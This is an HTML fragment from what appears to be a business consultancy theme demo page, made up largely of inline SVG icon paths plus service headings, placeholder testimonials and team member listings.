		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M509.07,194.061L414.3,99.29c-3.906-3.905-10.24-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l87.697,87.696    l-51.274,51.273c-1.571,1.57-4.126,1.57-5.695,0l-101.25-101.249c-1.571-1.57-1.571-4.125,0-5.696l34.411-34.413    c3.906-3.906,3.906-10.24,0-14.147c-3.907-3.906-10.239-3.906-14.148,0l-34.411,34.411c-7.128,7.129-8.818,17.655-5.1,26.412    l-11.638,11.638h-44.877h-3.537h-32.955l-14.682-14.682c0.564-2.058,0.862-4.201,0.862-6.392c0-6.42-2.501-12.456-7.04-16.995    l-33.481-33.481c-3.907-3.906-10.239-3.906-14.148,0c-3.906,3.906-3.906,10.24,0,14.148l33.482,33.481    c1.026,1.026,1.18,2.225,1.18,2.847s-0.153,1.821-1.181,2.848l-2.786,2.786l-98.495,98.471c-0.032,0.032-0.059,0.067-0.09,0.099    c-0.998,0.923-2.128,1.073-2.727,1.073c-0.623,0-1.822-0.153-2.848-1.179L24.15,201.114l88.876-88.875    c3.906-3.906,3.906-10.24,0-14.147s-10.238-3.906-14.148,0L2.93,194.041c-3.906,3.906-3.906,10.24,0,14.147l58.346,58.347    c4.687,4.686,10.841,7.028,16.995,7.028c2.826,0,5.646-0.518,8.329-1.507l32.843,32.843c-2.55,4.784-4,10.237-4,16.025    c0,18.853,15.338,34.191,34.191,34.191c0.042,0,0.084-0.003,0.126-0.003c0,0.002,0,0.004,0,0.006    c0,18.811,15.269,34.119,34.064,34.188c0,0.015-0.001,0.029-0.001,0.044c0,18.853,15.338,34.191,34.191,34.191    c5.8,0,11.265-1.456,16.055-4.015l12.227,12.227c5.732,5.732,13.354,8.889,21.46,8.889c8.107,0,15.729-3.157,21.46-8.889    c5.427-5.427,8.546-12.548,8.862-20.171c7.393-0.368,14.678-3.368,20.311-9.002c5.952-5.952,9.166-13.866,9.051-22.282    c0-0.018-0.001-0.035-0.001-0.053c8.703-0.54,16.71-4.354,22.63-10.805c5.951-6.482,8.896-14.656,8.87-22.81    c8.37-0.241,16.201-3.613,22.146-9.559c6.202-6.201,9.603-14.447,9.573-23.218c-0.017-5.164-1.229-10.132-3.49-14.608l32.81-30    c4.115,2.876,8.927,4.335,13.749,4.335c6.154,0,12.309-2.343,16.995-7.027l58.346-58.347    C512.976,204.301,512.976,197.967,509.07,194.061z M149.635,335.11c-7.822,0-14.185-6.363-14.185-14.185    c0-7.821,6.363-14.184,14.185-14.184c7.822,0,14.185,6.363,14.185,14.184C163.819,328.747,157.456,335.11,149.635,335.11z     M194.516,364.551c-0.407,0.386-0.804,0.781-1.192,1.186c-2.503,2.212-5.779,3.567-9.373,3.567    c-7.821,0-14.184-6.363-14.184-14.185s6.362-14.185,14.184-14.185s14.185,6.363,14.185,14.185    C198.135,358.743,196.758,362.042,194.516,364.551z M228.18,399.225c-0.046,0.044-0.095,0.082-0.14,0.127    c-0.05,0.05-0.091,0.104-0.139,0.154c-2.557,2.491-6.043,4.032-9.885,4.032c-7.823-0.002-14.186-6.365-14.186-14.186    c0-3.623,1.376-6.922,3.619-9.431c0.407-0.386,0.804-0.781,1.192-1.186c2.502-2.212,5.779-3.566,9.373-3.566    c7.821,0,14.185,6.363,14.185,14.185C232.199,393.19,230.663,396.669,228.18,399.225z M366.94,322.927    c-2.395,2.394-5.577,3.712-8.963,3.712s-6.568-1.318-8.963-3.711l-20.782-20.783c-3.906-3.906-10.238-3.906-14.148,0    c-3.906,3.906-3.906,10.24,0,14.147l20.781,20.782c0.001,0,0.002,0.001,0.002,0.001l0.063,0.063    c5.157,5.156,5.333,13.402,0.401,18.774c-2.478,2.7-5.859,4.257-9.522,4.385c-3.655,0.135-7.145-1.188-9.805-3.707l-20.011-18.942    c-4.013-3.798-10.344-3.625-14.142,0.388c-3.798,4.012-3.625,10.343,0.387,14.142l21.787,20.625    c2.157,2.042,3.367,4.802,3.408,7.772c0.041,2.97-1.093,5.762-3.193,7.862c-4.251,4.253-11.173,4.252-15.424,0l-10.101-10.101    c-3.907-3.906-10.239-3.906-14.148,0c-1.953,1.954-2.93,4.513-2.93,7.073s0.977,5.121,2.93,7.073l10.5,10.5    c1.954,1.954,3.03,4.551,3.03,7.313s-1.076,5.36-3.03,7.313c-1.954,1.954-4.551,3.029-7.313,3.029    c-2.763,0-5.359-1.076-7.313-3.03l-12.235-12.235c2.548-4.782,3.997-10.233,3.997-16.019c0-18.811-15.27-34.119-34.065-34.188    c0-0.015,0.001-0.029,0.001-0.044c0-18.853-15.338-34.191-34.191-34.191c-0.042,0-0.083,0.003-0.125,0.003    c0-0.002,0-0.004,0-0.006c0-18.853-15.338-34.19-34.191-34.19c-5.798,0-11.261,1.455-16.049,4.012l-31.265-31.264l88.44-88.441    l15.399,15.4c1.877,1.876,4.421,2.93,7.073,2.93h12.948l-39.486,39.486c-6.037,6.037-9.361,14.065-9.361,22.603    c0,8.538,3.324,16.565,9.361,22.602c6.037,6.038,14.065,9.362,22.603,9.362s16.566-3.325,22.603-9.362l33.491-33.492l36.665,0.402    l64.825,63.967c2.422,2.39,3.762,5.58,3.772,8.982C370.665,317.322,369.346,320.52,366.94,322.927z M374.169,284.024    l-60.938-60.131c-0.001-0.001-0.002-0.002-0.003-0.003l-0.088-0.087c-2.25-2.221-5.287-3.151-8.201-2.808l-43.539-0.477    c-2.7-0.02-5.28,1.027-7.183,2.929l-36.467,36.468c-2.259,2.259-5.262,3.502-8.455,3.502s-6.196-1.243-8.455-3.502    c-2.259-2.258-3.502-5.261-3.502-8.455c0-3.194,1.243-6.197,3.502-8.456l53.633-53.633h48.416c2.653,0,5.197-1.054,7.073-2.93    l13.328-13.328l82.237,82.237L374.169,284.024z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="438.336" cy="205.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="72.644" cy="206.74" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="131.064" cy="82.139" r="9.983"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="380.757" cy="81.338" r="9.983"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support Functions</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Finance Planning</a></h5>				<p>We are working in the format of an outsourcing project office. </p>			
										<img width="960" height="700" src="https://maxbizz.s3.amazonaws.com/images/image1-home5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-home5.jpg 960w, https://maxbizz.s3.amazonaws.com/images/image1-home5-300x219.jpg 300w, https://maxbizz.s3.amazonaws.com/images/image1-home5-768x560.jpg 768w" sizes="(max-width: 960px) 100vw, 960px" />											
	        testimonials	        <h2>What People Say About Us</h2>	    
											<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Mary Grey</h6>							client of company						
											<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Samanta Fox</h6>							client of company						
	        Improve Your Business	        <h3>Our Skilled Team</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				FINANCE MANAGER 			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/our-team/">Explore More </a>
			<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M267.3,479.04H65.56c-2.311,0-4.19-1.879-4.19-4.19v-52.436h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.032h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.039-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37v-49.033h8.486c14.039,0,25.461-11.422,25.461-25.461   c0-14.04-11.422-25.461-25.461-25.461H61.37V19.19c0-2.311,1.879-4.19,4.19-4.19h52.74c4.142,0,7.5-3.358,7.5-7.5   S122.442,0,118.3,0H65.56C54.979,0,46.37,8.608,46.37,19.19v52.437h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.033h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v49.032h-8.483c-14.04,0-25.461,11.422-25.461,25.461   c0,14.039,11.422,25.461,25.461,25.461h8.483v52.436c0,10.582,8.608,19.19,19.19,19.19H267.3c4.142,0,7.5-3.358,7.5-7.5   S271.442,479.04,267.3,479.04z M27.426,97.088c0-5.769,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003   s0.038-0.003,0.058-0.003h15.928c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887   C32.119,107.549,27.426,102.856,27.426,97.088z M27.426,197.043c0-5.769,4.693-10.461,10.461-10.461h31.969   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H53.957c-0.029,0-0.058-0.004-0.087-0.004   s-0.058,0.004-0.087,0.004H37.887C32.119,207.504,27.426,202.812,27.426,197.043z M27.426,296.998   c0-5.768,4.693-10.461,10.461-10.461h15.925c0.02,0,0.038,0.003,0.058,0.003s0.038-0.003,0.058-0.003h15.928   c5.768,0,10.461,4.693,10.461,10.461c0,5.768-4.693,10.461-10.461,10.461H37.887C32.119,307.459,27.426,302.767,27.426,296.998z    M27.426,396.953c0-5.769,4.693-10.461,10.461-10.461h31.969c5.768,0,10.461,4.693,10.461,10.461   c0,5.768-4.693,10.461-10.461,10.461H53.948c-0.026,0-0.051-0.004-0.077-0.004s-0.051,0.004-0.077,0.004H37.887   C32.119,407.414,27.426,402.721,27.426,396.953z"></path>
	<path d="M148.295,15h202.564c20.029,0,36.325,16.295,36.325,36.325v133.679c0,4.142,3.358,7.5,7.5,7.5s7.5-3.358,7.5-7.5V51.325   C402.184,23.024,379.159,0,350.859,0H148.295c-4.142,0-7.5,3.358-7.5,7.5S144.153,15,148.295,15z"></path>
	<path d="M476.084,447.256v-4.661c0-8.921-5.646-16.549-13.551-19.499l-2.458-59.614c-0.171-4.139-3.655-7.359-7.803-7.185   c-4.139,0.171-7.355,3.664-7.185,7.803l2.701,65.501c0.166,4.019,3.472,7.191,7.494,7.191c3.199,0,5.802,2.603,5.802,5.802v4.627   H328.282v-4.627c0-3.199,2.603-5.802,5.803-5.802c4.022,0,7.328-3.172,7.494-7.191l5.259-127.533h95.691l1.292,31.323   c0.171,4.138,3.659,7.355,7.803,7.185c4.139-0.17,7.355-3.664,7.185-7.803l-1.266-30.705h16.948c3.875,0,7.113-2.953,7.468-6.812   l7.575-82.241c0.193-2.1-0.506-4.184-1.927-5.742c-1.421-1.558-3.432-2.446-5.541-2.446h-32.193c-4.142,0-7.5,3.358-7.5,7.5v18.054   h-13.973l-2.248-18.938c-0.448-3.774-3.647-6.616-7.448-6.616h-48.04c-3.8,0-7,2.842-7.448,6.616l-2.248,18.938h-13.972v-18.054   c0-4.142-3.358-7.5-7.5-7.5h-32.193c-2.109,0-4.12,0.888-5.541,2.446c-1.421,1.558-2.121,3.642-1.927,5.742l7.575,82.241   c0.355,3.859,3.593,6.812,7.468,6.812h16.948l-4.991,121.027c-7.906,2.95-13.552,10.578-13.552,19.499v4.661   c-13.066,0.672-23.489,11.512-23.489,24.742V504.5c0,4.142,3.358,7.5,7.5,7.5h194.781c4.142,0,7.5-3.358,7.5-7.5v-32.502   C499.574,458.768,489.15,447.927,476.084,447.256z M315.525,219.828h16.471v18.054c0,4.142,3.358,7.5,7.5,7.5h28.135   c3.8,0,7-2.842,7.448-6.616l2.248-18.938h34.714l2.248,18.938c0.448,3.774,3.647,6.616,7.448,6.616h28.135   c4.142,0,7.5-3.358,7.5-7.5v-18.054h16.47l-6.193,67.241h-17.922H339.641h-17.923L315.525,219.828z M484.574,497H304.793v-25.002   c0-5.39,4.385-9.775,9.775-9.775h6.214h147.802h6.214c5.39,0,9.775,4.385,9.775,9.775V497z"></path>
	<path d="M217.372,92.562c0-18.108-14.732-32.84-32.84-32.84c-18.108,0-32.84,14.732-32.84,32.84s14.732,32.84,32.84,32.84   C202.64,125.401,217.372,110.669,217.372,92.562z M166.691,92.562c0-9.837,8.003-17.84,17.84-17.84   c9.837,0,17.84,8.003,17.84,17.84s-8.003,17.84-17.84,17.84C174.694,110.401,166.691,102.398,166.691,92.562z"></path>
	<path d="M187.046,226.088c-4.03,0.958-6.52,5.002-5.562,9.032c1.208,5.078,2.677,10.156,4.368,15.095   c1.066,3.114,3.978,5.073,7.095,5.073c0.805,0,1.625-0.131,2.43-0.406c3.919-1.342,6.008-5.606,4.667-9.525   c-1.535-4.484-2.87-9.096-3.966-13.707C195.12,227.619,191.075,225.13,187.046,226.088z"></path>
	<path d="M184.532,181.222c-4.142,0-7.5,3.358-7.5,7.5v8.252c0,2.347,0.05,4.724,0.149,7.063c0.17,4.031,3.491,7.183,7.488,7.183   c0.107,0,0.215-0.002,0.323-0.007c4.138-0.175,7.351-3.672,7.176-7.811c-0.09-2.129-0.136-4.292-0.136-6.428v-8.252   C192.032,184.58,188.674,181.222,184.532,181.222z"></path>
	<path d="M285.918,335.648c-4.399-1.759-8.769-3.755-12.986-5.933c-3.682-1.9-8.206-0.456-10.105,3.224   c-1.9,3.681-0.457,8.205,3.224,10.105c4.643,2.396,9.453,4.594,14.297,6.531c0.913,0.365,1.855,0.538,2.782,0.538   c2.977,0,5.793-1.784,6.966-4.717C291.635,341.551,289.764,337.187,285.918,335.648z"></path>
	<path d="M219.523,283.323c-2.747-3.866-5.337-7.91-7.7-12.017c-2.066-3.59-6.649-4.826-10.241-2.761   c-3.59,2.066-4.826,6.651-2.761,10.241c2.601,4.52,5.451,8.968,8.473,13.223c1.463,2.059,3.774,3.157,6.121,3.157   c1.502,0,3.019-0.45,4.337-1.386C221.128,291.382,221.921,286.7,219.523,283.323z"></path>
	<path d="M239.667,326.047c1.376,1.085,3.013,1.611,4.639,1.611c2.218,0,4.414-0.98,5.894-2.856   c2.565-3.252,2.007-7.968-1.245-10.533c-3.723-2.936-7.35-6.087-10.778-9.365c-2.995-2.863-7.742-2.757-10.604,0.238   c-2.863,2.994-2.756,7.741,0.238,10.604C231.583,319.352,235.572,322.818,239.667,326.047z"></path>
	<path d="M224.3,192.801c2.769-3.081,2.515-7.823-0.565-10.592l-34.19-30.725c-0.041-0.037-0.085-0.068-0.127-0.104   c-0.087-0.075-0.177-0.148-0.268-0.219c-0.098-0.077-0.197-0.152-0.298-0.223c-0.091-0.064-0.184-0.126-0.278-0.187   c-0.107-0.068-0.214-0.134-0.324-0.197c-0.096-0.055-0.192-0.107-0.29-0.158c-0.113-0.058-0.226-0.112-0.341-0.164   c-0.101-0.046-0.202-0.09-0.304-0.131c-0.118-0.047-0.236-0.089-0.355-0.13c-0.104-0.036-0.208-0.071-0.315-0.102   c-0.126-0.037-0.253-0.068-0.381-0.098c-0.102-0.024-0.203-0.05-0.306-0.07c-0.15-0.029-0.3-0.049-0.451-0.069   c-0.084-0.011-0.167-0.026-0.251-0.034c-0.481-0.047-0.966-0.047-1.447,0c-0.083,0.008-0.163,0.022-0.245,0.033   c-0.153,0.02-0.306,0.041-0.458,0.07c-0.101,0.019-0.199,0.045-0.299,0.068c-0.13,0.031-0.26,0.062-0.389,0.1   c-0.104,0.03-0.205,0.065-0.307,0.1c-0.122,0.042-0.243,0.085-0.364,0.133c-0.1,0.04-0.199,0.083-0.297,0.127   c-0.118,0.053-0.234,0.109-0.349,0.168c-0.096,0.049-0.19,0.101-0.283,0.154c-0.112,0.064-0.221,0.131-0.33,0.201   c-0.092,0.059-0.183,0.12-0.273,0.183c-0.102,0.072-0.203,0.148-0.302,0.226c-0.09,0.071-0.179,0.143-0.266,0.217   c-0.042,0.036-0.086,0.067-0.128,0.104l-34.19,30.725c-3.081,2.769-3.334,7.511-0.565,10.592c1.481,1.648,3.527,2.487,5.581,2.487   c1.786,0,3.578-0.634,5.011-1.921l29.177-26.22l29.177,26.22C216.79,196.135,221.531,195.882,224.3,192.801z"></path>
	<path d="M213.736,370.946c-2.929-2.929-7.678-2.929-10.606,0l-18.598,18.598l-18.598-18.598c-2.929-2.929-7.678-2.929-10.606,0   c-2.929,2.929-2.929,7.678,0,10.606l18.598,18.598l-18.598,18.598c-2.929,2.929-2.929,7.678,0,10.606   c1.464,1.464,3.384,2.197,5.303,2.197s3.839-0.732,5.303-2.197l18.598-18.598l18.598,18.598c1.464,1.464,3.384,2.197,5.303,2.197   s3.839-0.732,5.303-2.197c2.929-2.929,2.929-7.678,0-10.606l-18.598-18.598l18.598-18.598   C216.665,378.624,216.665,373.875,213.736,370.946z"></path>
</g>
